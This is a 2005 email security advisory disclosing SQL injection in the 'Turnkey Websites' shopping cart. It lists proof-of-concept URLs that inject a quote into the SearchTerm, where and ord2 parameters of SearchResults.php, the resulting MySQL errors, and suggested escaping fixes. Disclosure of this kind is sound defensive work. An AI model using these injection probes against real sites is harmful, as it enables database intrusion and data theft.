This is a multi-part message in MIME format. ------=_NextPart_000_0005_01C537E8.69C2ED90 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dcrab 's Security Advisory [Hsc Security Group] http://www.hackerscenter.com/ [dP Security] http://digitalparadox.org/ Severity: High Title: Multiple SQL injection vulnerabilities in Turnkey Websites: = SHOPPING CART Date: 03/04/2005 Vendor: Turnkey Websites Vendor Website: http://www.turnkeywebsites.info/ Summary: There are, multiple sql injection vulnerabilities in turnkey = websites: shopping cart. Proof of Concept Exploits:=20 http://localhost/SearchResults.php?SearchTerm=3D'SQL_INJECTION&where=3D'S= QL_INJECTION&ord1=3DItemPrice&ord2=3Ddesc SQL INJECTION You have an error in your SQL syntax. Check the manual that corresponds = to your MySQL server version for the right syntax to use near = '\'SQL_INJECTION like '%\'SQL_INJECTION%' order by Ite http://localhost/SearchResults.php?SearchTerm=3Ddcrab&where=3D'SQL_INJECT= ION&ord1=3D&ord2=3Ddesc SQL INJECTION You have an error in your SQL syntax. Check the manual that corresponds = to your MySQL server version for the right syntax to use near = '\'SQL_INJECTION like '%dcrab%' order by desc limit 0 http://localhost/SearchResults.php?SearchTerm=3Ddcrab&where=3DItemDescrip= tion&ord1=3DItemPrice&ord2=3D'SQL_INJECTION SQL INJECTION You have an error in your SQL syntax. Check the manual that corresponds = to your MySQL server version for the right syntax to use near '\'SQL = INJECTION limit 0, 5' at line 7 Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), = mysql_real_escape_string() and other functions for input validation = before passing user input to the mysql database, or before echoing data = on the screen, would solve these problems. Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah Author:=20 These vulnerabilties have been found and released by Diabolic Crab, = Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to = contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com or http://digitalparadox.org/. Look outfor = my soon to come out book on Secure coding with php. Diabolic Crab's Security Services: Contact at = dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM for Php auditing and web = application securing services, along with programming in php, vb, asp, = c, c++, perl, java, html and graphic designing. -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 - not licensed for commercial use: www.pgp.com iQA/AwUBQk7wkSZV5e8av/DUEQJHMwCglMZY7yi5wKzYRXO+YxxpBQN8+lwAnimE QhGm25bVs6szjFhP7UFIxz19 =3DjKuM -----END PGP SIGNATURE----- ------=_NextPart_000_0005_01C537E8.69C2ED90 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

-----BEGIN PGP SIGNED = MESSAGE-----
Hash:=20 SHA1

Dcrab 's Security Advisory
[Hsc = Security Group]=20 http://www.hackerscenter.com/<= BR>[dP=20 Security] http://digitalparadox.org/=

Severity: High
Title: Multiple SQL = injection=20 vulnerabilities in Turnkey Websites: SHOPPING CART
Date:=20 03/04/2005

Vendor: Turnkey Websites
Vendor = Website: http://www.turnkeywebsites.info= /
Summary:=20 There are, multiple sql injection vulnerabilities in turnkey websites: = shopping=20 cart.

Proof of Concept Exploits: =

http://loc= alhost/SearchResults.php?SearchTerm=3D'SQL_INJECTION&where=3D'SQL_INJ= ECTION&ord1=3DItemPrice&ord2=3Ddesc
SQL=20 INJECTION
You have an error in your SQL syntax. Check the manual that = corresponds to your MySQL server version for the right syntax to use = near=20 '\'SQL_INJECTION like '%\'SQL_INJECTION%' order by Ite

http://localhost/SearchResult= s.php?SearchTerm=3Ddcrab&where=3D'SQL_INJECTION&ord1=3D&ord2=3D= desc
SQL=20 INJECTION
You have an error in your SQL syntax. Check the manual that = corresponds to your MySQL server version for the right syntax to use = near=20 '\'SQL_INJECTION like '%dcrab%' order by desc limit 0

http://lo= calhost/SearchResults.php?SearchTerm=3Ddcrab&where=3DItemDescription&= amp;ord1=3DItemPrice&ord2=3D'SQL_INJECTION
SQL=20 INJECTION
You have an error in your SQL syntax. Check the manual that = corresponds to your MySQL server version for the right syntax to use = near '\'SQL=20 INJECTION limit 0, 5' at line 7

Possible Fixes: The usage of htmlspeacialchars(),=20 mysql_escape_string(), mysql_real_escape_string() and other functions = for input=20 validation before passing user input to the mysql database, or before = echoing=20 data on the screen, would solve these problems.

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.a= h

Author:
These vulnerabilties have been found and released by = Diabolic=20 Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel = free to=20 contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com = or http://digitalparadox.org/. Look = outfor my=20 soon to come out book on Secure coding with php.

Diabolic Crab's Security Services: Contact at=20 dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM for Php auditing and web=20 application securing services, along with programming in php, vb, asp, = c, c++,=20 perl, java, html and graphic designing.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed = for=20 commercial use: www.pgp.com

iQA/AwUBQk7wkSZV5e8av/DUEQJHMwCglMZY7yi5wKzYRXO+YxxpBQN8+lwAnimE
= QhGm25bVs6szjFhP7UFIxz19
=3DjKuM
-----END=20 PGP SIGNATURE-----

------=_NextPart_000_0005_01C537E8.69C2ED90--